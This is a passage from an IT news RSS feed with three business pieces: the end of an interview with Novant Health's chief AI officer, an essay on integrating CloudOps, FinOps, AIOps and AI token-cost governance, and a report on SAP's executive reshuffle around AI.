<p>The mantra is simple. AI isn’t put on top of a stack of technology and processes. It’s a vehicle that allows us to challenge the status quo and ask if there’s a better way, how would we construct a hospital if we started today, and what’s my ideal working environment as a nurse. We take the persona of the team member and patient, and reimagine their work with the power of predictive, generative, and agentic AI.</p>



<p><strong>What are some examples of this strategy in action on the patient side?</strong></p>



<p>We all love to ask our phones if nagging knee pain is chronic or acute, but the information we receive isn’t always valid. Novant Health created a virtual care AI agent that answers medical questions safely and clinically accurate, using your health records within secure firewalls. The agent gives the patient better information, with correct patient data, and the privacy choice not to put their personal health information into ChatGPT.</p>



<p>We’ve also launched a proactive outreach program for high-risk patients who don’t know they’re at risk. We use predictive AI to identify them based on their health factors, and conversational AI to reach out and encourage them to schedule diagnostic scans. Early detection, after all, saves lives.</p>



<p><strong>What are you doing on the operational side with AI?</strong></p>



<p>Healthcare is complex with a variety of reasons for payers to deny claims, and for providers to challenge. But in the middle are patients who are stuck. We use gen AI to draft claim appeals, which allows us to represent the patient’s interest, give clarity to the claims challenge, and raise patient satisfaction. We’re also using AI to improve patient advocacy in a very meaningful way. Whether it’s cancer outreach or patient advocacy, healthcare requires significant human capital, not just at Novant, but in any 24/7 provider environment. AI doesn’t sleep.</p>



<p><strong>This CAIO role didn’t exist a year ago. How do you define it?</strong></p>



<p>The mandate of the chief AI officer is to enact and orchestrate the transformation that leverages operational excellence, innovation, and technology while keeping the patient at the center. My team and I are designing the new choreography that runs across the entire organization.</p>



<p>Our CIO and his organization are essential partners, leading the core infrastructure across data, cyber, and ERP/EHR, while my organization complements that work by designing the system of the future. We have product leaders, AI engineers, and software and platform engineers who build homegrown AI solutions alongside the hyper-scalers and domain-specific language model partners, all of whom are positioned to leverage AI.</p>



<p><strong>What is the advantage of a CAIO as a peer to IT leadership?</strong></p>



<p>The peer seat allows AI leaders authentically to interrogate how the organization is functioning. What are our real success metrics? What are we doing to achieve them? How can automation and innovation get us to that North Star faster?</p>



<p>Every business leader is in pursuit of a goal, and every pursuit has friction. Traditionally, when a business leader brings that friction to IT, they present it as a problem, a solution, and a directive to use this technology to fix the problem. With AI, our business leaders start with a problem and an interest in consuming data differently. They want help thinking through the problem, they aren’t ordering a solution.</p>



<p>That shift is significant. The people-process-technology framework is now influenced by AI, which provides a level of context not available before. AI is a context creator, rather than a content creator. We haven’t had that before.</p>



<p><strong>What advice would you give to healthcare CEOs right now?</strong></p>



<p>Three things keep healthcare CEOs awake at night. The complexity and cost of healthcare are rising, prompting people to avoid going at all. The nurse population — arguably the most important and most populous in healthcare — is dwindling. And the cost of staying in business is a challenge, between Medicare, Medicaid, and everything else.</p>



<p>As a CEO, I’d start with literacy. The CEO and leadership team must understand what AI can do. Break those opportunities into two buckets of excellence and enrichment. Excellence is how you engage with patients and run your operations. Enrichment is augmentation in that AI is a companion to the clinician, noting very early-stage detection. This is happening at Novant Health now.</p>



<p>Then start to innovate, in both physical and digital spaces. We’re actively leveraging precision robotic surgery and launching an AI solution for diabetic retinopathy, a common high-risk condition for people who don’t get regular eye exams, or something they don’t know they have. A primary care physician, augmented by AI, can now detect it. That’s where physical meets digital.</p>



<p>Whether they decide to hire a chief AI officer or not isn’t the point. The most important question is are you thinking about AI with a viable lens. Do you have a purposed organization and leader fully empowered to challenge the status quo. If you don’t, that’s where to start.</p>



<p><strong>When should companies hire a CAIO as a peer to the CIO?</strong></p>



<p>There’s no one set formula. In some companies, the CAIO sits above the CIO and at others, below. At Novant, our organizations are healthy peers. What clicks with the DNA of your company is the right thing to do.</p>



<p>My CIO and his organization are true partners to our transformation team. We’re completely aligned, and we advance the mission together. If you’re not in a position where a CIO and CAIO can advance your position, then don’t hire one. It’s what makes sense right now for us, and like so much with AI, it’ll change over time.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[A framework for operational autonomy: Integrating CloudOps, FinOps and AIOps]]></title>
<description><![CDATA[Operational autonomy is quickly becoming one of the defining capabilities of a modern enterprise. As digital estates become more distributed, cloud environments more dynamic and AI consumption more expensive and less predictable, traditional operating models begin to show their limits. Teams can ...]]></description>
<link>https://tsecurity.de/de/3637916/it-security-nachrichten/a-framework-for-operational-autonomy-integrating-cloudops-finops-and-aiops/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3637916/it-security-nachrichten/a-framework-for-operational-autonomy-integrating-cloudops-finops-and-aiops/</guid>
<pubDate>Wed, 01 Jul 2026 11:06:18 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Operational autonomy is quickly becoming one of the defining capabilities of a modern enterprise. As digital estates become more distributed, cloud environments more dynamic and AI consumption more expensive and less predictable, traditional operating models begin to show their limits. Teams can no longer rely only on manual oversight, disconnected monitoring tools or periodic financial reviews to keep enterprise technology healthy and cost efficient. What is needed instead is a coordinated operating framework that brings together CloudOps, FinOps and AIOps, while also addressing the emerging discipline of AI token and model consumption governance. When these disciplines are designed as one connected system rather than as isolated workstreams, organizations move closer to operational excellence: faster decisions, better resilience, improved financial control, stronger compliance and a more measurable connection between technology investments and business outcomes.</p>



<h2 class="wp-block-heading">What operational autonomy means in enterprise IT</h2>



<p>Operational autonomy does not mean removing people from operations. In practice, it means designing enterprise IT so that routine sensing, decision support, remediation, optimization and policy enforcement happen with minimal friction and with the right human oversight at the right moments. A mature autonomous operating model continuously observes infrastructure, applications, data flows, AI services and financial consumption patterns; detects risk or inefficiency early; and triggers guided or automated action based on policy, confidence and business criticality. This approach depends on four connected pillars: CloudOps to maintain reliable and scalable digital infrastructure, FinOps to govern cost and value, AIOps to detect patterns and automate response, and AI consumption governance to manage token usage, model selection, inference workloads and unit economics.</p>



<p>Gartner’s 2024 <a href="https://www.gartner.com/en/documents/5703151" rel="nofollow">research</a> on FinOps for data and analytics emphasizes that cloud operations and financial governance are no longer separate concerns, especially as AI workloads reshape cost structures and accountability expectations. Forrester’s 2024 <a href="https://www.forrester.com/report/the-state-of-aiops-and-observability/RES180470" rel="nofollow">analysis</a> of AIOps and observability similarly notes that modern enterprises need deeper operational visibility and broader insight-driven coordination to handle hybrid complexity. IDC’s 2024 <a href="https://www.marketresearch.com/IDC-v2477/Future-Operations-Framework-38402860/" rel="nofollow">perspective</a> on future operations adds another useful lens by framing data-driven operations around agility, resilience and predictability. Taken together, these viewpoints reinforce the same idea: autonomy is not a tool purchase; it is a management framework.</p>



<h2 class="wp-block-heading">Design principles for an enterprise operational autonomy framework</h2>



<p>A practical framework begins with a few disciplined principles. First, the enterprise must build around a shared operational data layer. Telemetry from cloud infrastructure, applications, service management systems, security controls, business transactions and AI services should be normalized so that operations, finance and governance teams work from the same facts. Second, every automated action should be policy-aware. Cost optimization, scaling, failover, remediation, model routing, data retention and access control should all reflect business guardrails rather than isolated technical rules.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large is-resized"> width="1024" height="688" sizes="auto, (max-width: 1024px) 100vw, 1024px"&gt;<figcaption class="wp-element-caption">Figure: The four pillars of autonomous IT.</figcaption></figure><p class="imageCredit">Magesh Kasthuri</p></div>



<p>Third, the framework should be value-led rather than purely cost-led. FinOps has matured beyond simply lowering spend; the stronger objective is to align spend with business priorities, performance requirements and acceptable risk. Fourth, autonomy should progress in stages. Enterprises usually start with visibility, then introduce recommendations, then guided automation and finally closed-loop autonomy for low-risk scenarios. Fifth, executive accountability must be explicit. Operational autonomy touches architecture, finance, privacy, security, data stewardship and business strategy. Without a cross-functional ownership model, autonomy becomes fragmented and difficult to govern. Everest Group’s 2024 FinOps Cloud Cost Management <a href="https://www.everestgrp.com/report/egr-2024-29-r-6601/" rel="nofollow">assessment</a> highlights the growing demand for role-based access, cost intelligence, governance and automation as core requirements for enterprise cloud cost management products. That is a useful signal that the framework must be built for collaboration, not just analytics.</p>



<h2 class="wp-block-heading">Integrating CloudOps, FinOps and AIOps into one operating model</h2>



<p>CloudOps, FinOps and AIOps are often discussed separately because each emerged from a different operational problem. CloudOps grew out of the need to run cloud estates reliably and at scale. FinOps developed in response to unpredictable consumption-based billing. AIOps emerged because traditional monitoring could not keep pace with the volume and complexity of telemetry generated across modern digital systems. Yet in a mature enterprise, these disciplines converge naturally.</p>



<p>A performance incident in a cloud platform is rarely only an availability problem; it may also drive higher infrastructure consumption, trigger excess logging charges, degrade customer experience or increase token usage in AI-enabled workflows. Similarly, a cost spike may not be a finance issue alone; it may reveal inefficient architecture, poor scheduling, unnecessary data movement or an AI agent behaving outside policy.</p>



<p>An integrated operating model therefore links observability signals, service context, business KPIs, financial metrics and automation rules into one decision fabric. CloudOps provides the runtime discipline, FinOps introduces value and accountability, and AIOps adds pattern recognition and intelligent response. When connected well, the enterprise can answer not only what is happening, but why it is happening, what it is costing, what risk it creates and what the best next action should be.</p>



<h2 class="wp-block-heading">AI token optimization and AI cost spend governance</h2>



<p>AI introduces a new cost curve into enterprise operations. Unlike traditional software costs, token spend can vary sharply based on prompt design, model choice, context length, retrieval patterns, orchestration logic, concurrency, caching strategy and user behavior. This makes AI cost governance an essential part of operational autonomy. A strong framework begins by defining the unit economics of AI consumption: cost per request, cost per conversation, cost per business workflow, cost per user segment and cost per outcome.</p>



<p>Once these baselines are visible, the enterprise can introduce optimization controls such as prompt compression, response-length policies, semantic caching, model tiering, workload routing to lower-cost models where quality tolerance allows, context-window discipline, batch processing for non-real-time use cases and approval thresholds for premium model usage. AI gateways and model brokers can enforce these policies consistently across teams.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large is-resized"> width="1024" height="709" sizes="auto, (max-width: 1024px) 100vw, 1024px"&gt;<figcaption class="wp-element-caption">Figure 2: AI FinOps framework</figcaption></figure><p class="imageCredit">Magesh Kasthuri</p></div>



<p>Chargeback or showback mechanisms should also extend to AI services so that business units see both value and consumption behavior. Recent <a href="https://www.forbes.com/councils/forbesfinancecouncil/2026/05/27/a-cfos-five-layer-framework-to-govern-ai-token-spend-before-it-governs-you/" rel="nofollow">analysis</a> in Forbes has drawn attention to the financial risks of unmanaged token growth and argues for governance layers that connect finance and engineering before AI expenditure becomes opaque. FinOps Foundation guidance on FinOps for AI reinforces the same message, noting that token-level metrics, quotas, tagging, GPU allocation practices and real-time monitoring are necessary to keep AI costs aligned to business value. In enterprise settings, the lesson is straightforward: if cloud cost needed FinOps, AI cost needs an even tighter form of FinOps because usage can scale much faster and become far less transparent as mentioned in IDC <a href="https://my.idc.com/getdoc.jsp?containerId=US53688325" rel="nofollow">report</a>.</p>



<h2 class="wp-block-heading">FinOps for cloud infrastructure cost management</h2>



<p>Cloud infrastructure cost management remains one of the foundational layers of operational autonomy because every autonomous workflow eventually rests on compute, storage, networking, platform services and data transfer. An effective FinOps capability does more than flag overspend after the month has ended. It creates near-real-time visibility into consumption, ownership, unit economics, forecast variance, commitments and waste patterns.</p>



<p>The enterprise should define standard practices for tagging, cost allocation, commitment management, rightsizing, idle resource detection, storage tiering, Kubernetes cost visibility, environment lifecycle controls and architecture reviews for high-cost services. More importantly, these practices should be tied to business context. For example, a workload serving a mission-critical customer channel may justify higher spend if it supports revenue protection, whereas a non-production environment should have stricter shutdown and spend caps.</p>



<p>Gartner’s 2024 <a href="https://www.gartner.com/en/documents/5703151" rel="nofollow">research</a> on FinOps for data and analytics underscores that AI and data workloads are changing the financial profile of cloud operations and increasing the need for more sophisticated tooling and governance. IDC’s market <a href="https://www.intel.com/content/dam/www/central-libraries/us/en/documents/2024-03/idc-ai-strategy-in-2024-growth-roi-security-brief.pdf" rel="nofollow">perspective</a> on intelligent cloud and edge operations with FinOps software also points to the rapid growth of platforms that combine operations intelligence with financial control, suggesting that enterprises increasingly view operational management and cost management as linked disciplines rather than separate layers.</p>



<h2 class="wp-block-heading">Autonomous operations through AIOps</h2>



<p>AIOps gives the framework its intelligence and response speed. In most enterprises, operations data is noisy, fragmented and too voluminous for humans to interpret quickly during incidents or performance degradation. AIOps platforms reduce that burden by correlating events, identifying anomalies, clustering symptoms, surfacing probable root causes and recommending or initiating remediation actions. The best outcomes appear when AIOps is connected not only to infrastructure monitoring but also to service maps, change records, configuration data, incident workflows and business priorities.</p>



<p>That connection allows the enterprise to distinguish between a harmless signal fluctuation and an issue that threatens a critical business service. Forrester’s 2024 <a href="https://www.forrester.com/report/the-state-of-aiops-and-observability/RES180470" rel="nofollow">research</a> on AIOps and observability explains this well by describing the complementary value of breadth and depth: observability provides richer technical insight, while AIOps helps transform those signals into operational action. In practice, autonomy grows when low-risk responses such as service restarts, resource adjustments, ticket enrichment, dependency checks or rollback decisions are automated under policy. High-risk actions should remain human-approved until confidence improves. Over time, the enterprise can move from reactive incident management to predictive operations, where emerging capacity risk, recurring error patterns or unusual AI workload behavior are addressed before service impact is visible to users.</p>



<h2 class="wp-block-heading">How the framework leads to operational excellence</h2>



<p>Operational excellence is the cumulative result of better decisions made earlier, faster and with clearer accountability. A well-designed autonomy framework improves service reliability because systems are observed continuously and remediation can be triggered before failures spread. It improves cost discipline because consumption anomalies are identified at the same time as performance or usage anomalies, not weeks later in a billing report.</p>



<p>It improves strategic focus because technology leaders can evaluate trade-offs in terms of business value rather than technical activity alone. It also improves employee productivity by removing repetitive operational effort and shifting skilled staff toward engineering improvements, policy tuning and service innovation. The most important outcome, however, is predictability. Enterprises become more confident in how they scale AI services, how they control cloud spend, how they handle operational events and how they meet compliance obligations. That confidence is what separates routine automation from genuine operational autonomy.</p>



<h2 class="wp-block-heading">Security, governance, process implementation and people upskilling</h2>



<p>No autonomy framework survives without strong security and governance. Automated operations amplify both efficiency and risk, which means identity controls, segmentation, least-privilege access, secrets management, encryption and auditability have to be embedded from the start. AI services add further concerns: prompt leakage, data residency, model misuse, training-data exposure, shadow AI adoption and uncontrolled access to external models.</p>



<p>Governance therefore needs to extend across cloud resources, operational workflows, AI services and data assets. Enterprises should establish clear policy domains covering infrastructure provisioning, AI model approval, token limits, vendor usage, observability data handling, retention rules, access reviews and exception management. Process implementation is equally important. The framework should define standard operating patterns for incident triage, automated remediation approval, cost anomaly review, model lifecycle management and post-incident learning. None of this works unless people are prepared for the shift.</p>



<p>Operations teams need skills in cloud economics, observability, automation engineering and policy-driven operations. Finance teams need to understand cloud and AI consumption models. Security and privacy teams need fluency in AI risk scenarios and control design. Business leaders need a clearer grasp of unit economics and value realization. IDC’s 2024 <a href="https://www.intel.com/content/dam/www/central-libraries/us/en/documents/2024-03/idc-ai-strategy-in-2024-growth-roi-security-brief.pdf" rel="nofollow">briefing</a> on enterprise AI strategy highlights the tension between rapid AI investment, ROI pressure, staffing constraints, security and compliance. That is exactly why upskilling must be treated as part of the framework itself, not as an optional change-management activity as per FinOps Foundation <a href="https://www.finops.org/wg/finops-for-ai-overview/" rel="nofollow">documentation</a>.</p>



<h2 class="wp-block-heading">The role of regulatory compliance</h2>



<p>Regulatory compliance is not a side topic in operational autonomy; it is one of the main reasons the framework must be formalized. Cloud environments frequently span jurisdictions, AI systems process sensitive information, observability platforms collect detailed operational data and automated decisions may influence customer experience or internal controls. Regulations such as GDPR, DPDP, sector-specific cybersecurity directives, financial reporting obligations, contractual data-handling requirements and internal audit standards all shape what autonomy can and cannot do.</p>



<p>Compliance requirements should therefore be translated into operational policy. Examples include residency-aware workload placement, data minimization in logs and prompts, access segregation for financial and regulated data, explainable automated actions, evidence retention, periodic control attestations and approval workflows for AI usage involving personal or confidential information. Chief privacy and data leaders play a central role here because the compliance question is no longer just where data is stored, but also how data is observed, transformed and consumed by AI-driven services. A mature framework reduces compliance risk by making control enforcement systematic rather than dependent on manual effort.</p>



<h2 class="wp-block-heading">How to implement the framework in practice</h2>



<p>Implementation is usually most successful when handled in phases. The first phase is baseline visibility: consolidate telemetry, cloud billing data, service inventory, AI usage data and business ownership into one operational picture. The second phase is governance design: define policies for tagging, spend thresholds, automation boundaries, access controls, model usage and compliance checkpoints.</p>



<p>The third phase is prioritization: choose a small number of use cases where autonomy can produce measurable value, such as cloud rightsizing, incident correlation, cost anomaly detection, AI token governance or automated remediation for recurring low-risk faults. The fourth phase is automation with guardrails: deploy workflows, approval rules and rollback paths. The fifth phase is optimization and learning: review outcomes, refine policies, update unit economics, expand autonomy coverage and measure business impact.</p>



<p>This staged approach matters because full autonomy is not achieved by switching on one platform. It is built progressively through trusted control, good data and disciplined execution.</p>



<h2 class="wp-block-heading">Useful tools for building the framework</h2>



<p>The tool landscape should be chosen based on architecture, governance maturity and operating model rather than vendor popularity alone. Cloud-native cost and operations tools from hyperscalers provide baseline visibility, but many enterprises supplement them with specialized FinOps platforms for allocation, forecasting, commitment analysis and chargeback. Observability platforms help unify metrics, logs, traces and service maps, while AIOps platforms add anomaly detection, event correlation and automation orchestration.</p>



<p>Service management platforms remain important for change control, incident workflows and audit evidence. AI gateways and model management layers are increasingly useful for token monitoring, policy enforcement, prompt controls, model routing and usage analytics. Security posture management, DSPM, identity governance and compliance automation tools also become part of the architecture because autonomy without trust quickly becomes fragile. The most effective toolchains are the ones that integrate technical telemetry, financial signals, governance policy and workflow automation into a coherent operating system for the enterprise.</p>



<h2 class="wp-block-heading">Executive roles in developing and managing the framework</h2>



<p>Here is a table that summarizes various Executive Roles and their responsibilities in Operational Autonomy governance.</p>



<figure class="wp-block-table"><div class="overflow-table-wrapper"><table class="has-fixed-layout"><tbody><tr><td><strong>Executive Role</strong></td><td><strong>Primary Responsibility in the Framework</strong></td><td><strong>Key Decisions and Governance Focus</strong></td></tr><tr><td>CIO</td><td>Owns the enterprise operating model and ensures CloudOps, FinOps and AIOps are aligned to business service outcomes.</td><td>Sets operating priorities, funds enabling platforms, establishes accountability, sponsors service reliability and cost transparency programs, and chairs cross-functional governance.</td></tr><tr><td>CTO</td><td>Defines the target architecture for autonomy, including cloud platforms, observability, automation, AI services and integration patterns.</td><td>Approves technical standards, automation design principles, platform engineering choices, model architecture strategy and engineering guardrails for scale and resilience.</td></tr><tr><td>Chief Privacy Officer</td><td>Ensures that data use in observability, automation and AI operations complies with privacy law and internal policy.</td><td>Defines controls for personal data handling, retention, consent boundaries, cross-border transfer considerations, prompt and log privacy, and privacy impact assessments.</td></tr><tr><td>Chief Data Officer</td><td>Leads data governance, data quality, metadata management and trustworthy access to the shared operational data layer.</td><td>Defines data classification, stewardship, lineage expectations, AI data usage standards and interoperability rules required for accurate autonomous decision-making.</td></tr><tr><td>Chief Strategy Officer</td><td>Connects the autonomy framework to enterprise transformation goals, investment priorities and measurable business value.</td><td>Shapes business case design, prioritizes value pools, aligns the framework with growth and efficiency strategy, and ensures operating metrics support executive decision-making.</td></tr></tbody></table> </div></figure>



<h2 class="wp-block-heading">Conclusion</h2>



<p>Developing operational autonomy for an enterprise is not about chasing a futuristic ideal. It is about building a disciplined and connected operating model that helps the organization run technology with greater confidence, speed and accountability. CloudOps keeps the estate reliable, FinOps ensures that spending reflects value, AIOps makes complexity manageable and AI cost governance brings much-needed control to token-driven consumption. Security, privacy, compliance, process rigor and people capability are what make the framework sustainable. When all of these parts work together, the enterprise does not just automate tasks; it strengthens resilience, improves financial stewardship and creates a more adaptive path to operational excellence.</p>



<p><em>This article was made possible by our partnership with the IASA </em><a href="https://chiefarchitectforum.org/" target="_blank" rel="nofollow"><em>Chief Architect Forum</em></a><em>. The CAF’s purpose is to test, challenge and support the art and science of Business Technology Architecture and its evolution over time as well as grow the influence and leadership of chief architects both inside and outside the profession. The CAF is a leadership community of the </em><a href="https://iasaglobal.org/" target="_blank" rel="nofollow"><em>IASA</em></a><em>, the leading non-profit professional association for business technology architects.</em></p>



<p><strong>This article is published as part of the Foundry Expert Contributor Network.</strong><br><strong><a href="https://www.cio.com/expert-contributor-network/">Want to join?</a></strong></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[SAP reshuffles exec oversight of AI]]></title>
<description><![CDATA[For the second time this year, SAP is shaking up its executive ranks as it continues its quest to adapt to an AI-centric world.



The first shake-up came in March, with the creation of the Customer Value Group, merging SAP’s Customer Success and Customer Services and Delivery organizations to pu...]]></description>
<link>https://tsecurity.de/de/3637914/it-security-nachrichten/sap-reshuffles-exec-oversight-of-ai/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3637914/it-security-nachrichten/sap-reshuffles-exec-oversight-of-ai/</guid>
<pubDate>Wed, 01 Jul 2026 11:06:15 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>For the second time this year, SAP is shaking up its executive ranks as it continues its quest to adapt to an AI-centric world.</p>



<p>The first shake-up came in March, with the creation of the <a href="https://www.cio.com/article/4139431/sap-reshuffles-executive-responsibilities-as-it-goes-all-in-on-ai.html">Customer Value Group</a>, merging SAP’s Customer Success and Customer Services and Delivery organizations to put sales, delivery, services, and support of its products under the leadership of executive board member for customer services and delivery <a href="https://www.sap.com/about/company/leadership/thomas-saueressig.html" target="_blank" rel="nofollow">Thomas Saueressig</a>, who is now chief customer officer.</p>



<p>Shortly thereafter, the company announced that executive board member in charge of product and engineering <a href="https://www.sap.com/about/company/leadership/muhammad-alam.html" rel="nofollow">Muhammad Alam</a> had decided not to renew his contract when it expires in March 2027.</p>



<p>The consequences of that are being felt now as, rather than immediately replacing Alam, the company has decided to split his responsibilities among other executives, with CEO Christian Klein managing all of Alam’s teams except industrial AI, which will be run by COO Sebastian Steinhäuser, <a href="https://www.bloomberg.com/news/articles/2026-06-30/sap-distributes-ai-product-oversight-to-ceo-coo-in-reshuffle" target="_blank" rel="nofollow">Bloomberg reported</a>. It said SAP will conduct an external search, focusing on the US, for a new executive product lead, although it is “unclear” how the role will be structured.</p>



<p>Alam oversaw both SAP’s global product and engineering organization and its software applications, including product strategy and development.</p>



<h2 class="wp-block-heading">Accelerating transformation</h2>



<p>The changes will hasten SAP’s AI transformation and make it more competitive, a company spokesperson told CIO. “SAP is evolving its organization to accelerate its transformation toward an AI-driven Autonomous Enterprise,” the spokesperson said via email. “The new structure brings AI, data, and core applications closer together, enabling more integrated, end-to-end solutions built on SAP’s unique process expertise. These changes sharpen SAP’s competitive edge in Business AI, combining deep process knowledge, trusted data, and flexible platforms to deliver differentiated, reliable AI outcomes at scale, and reinforcing SAP’s position at the forefront of the next generation of enterprise software.”</p>



<p>Although a second leadership change within a few months could be a cause for concern, <a href="https://moorinsightsstrategy.com/team/jason-andersen/" target="_blank" rel="nofollow">Jason Andersen</a>, VP and principal analyst at Moor Insights &amp; Strategy, sees the changes as necessary to help the company overcome customers’ reluctance to undertake complex and expensive software upgrades. “While AI has the potential to technically reduce those challenges, significant work remains to address cultural, industry-specific, and regulatory needs,” he said, adding that the task of helping customers migrate could distract from new innovations and growth opportunities. “The change in Thomas’ role in the Spring reflects the magnitude of the install base challenge. The shift in Christian’s focus is to help drive what will be an equally big job of shifting SAP from a SaaS-first company to an AI-first company.”</p>



<h2 class="wp-block-heading">AI alone will not drive value</h2>



<p><a href="https://www.infotech.com/profiles/terra-higginson" target="_blank" rel="nofollow">Terra Higginson</a>, a principal research director at Info-Tech Research Group, said, “Companies are starting to get serious about the value gap in AI. This leadership shift shows that SAP recognizes AI alone will not drive value. SAP is trying to figure out where strategy is getting lost in execution, but they are not the only ones. The same issue is showing up across the software market.”</p>



<p>And, said <a href="https://greyhoundresearch.com/svg/" target="_blank" rel="nofollow">Sanchit Vir Gogia</a>, chief analyst at Greyhound Research, “SAP’s reshuffle is best read as a signal about accountability, not as proof that the AI execution problem is already solved. The pattern, however, is unmistakable. SAP is rebuilding its operating model around AI, adoption and cloud-led execution”</p>



<p>He reads the timing of the change as a response to what he called “genuine pressure on the economics of enterprise software,” pointing out, “executive urgency does not, by itself, make an agent safe enough to touch finance or payroll. The right posture is disciplined curiosity, neither applause nor panic.”</p>



<p>CIOs should ask SAP one brutally practical question first, he said: What changes for my estate because of this reported reshuffle? In other words, what changes in roadmap ownership, release timing and contractual accountability, “because that is the only question that matters when signing renewals or defending a program to a board.”</p>



<h2 class="wp-block-heading">Focus on contract language</h2>



<p>And as the company builds more AI into its products, he recommended CIOs move their focus from the company’s product claims to its contract language, including clarity on model-provider boundaries, customer-data use and opt-out rights.</p>



<p>“If SAP says customer data will not train third-party models, that belief belongs in the agreement, not on a homepage. Contracts should also pin down how AI is metered as features move from included to consumption-priced,” he said. “The sharpest question is where accountability sits when a workflow crosses SAP and non-SAP systems. A product promise that cannot be traced to an accountable owner is a slogan, not a commitment.”</p>



<p>So, he said, “Enterprise customers should not buy the reshuffle. They should interrogate the operating model.”</p>
</div></div></div></div>]]></content:encoded>
</item>
</channel>
</rss>
<!-- Generated in 0,34ms -->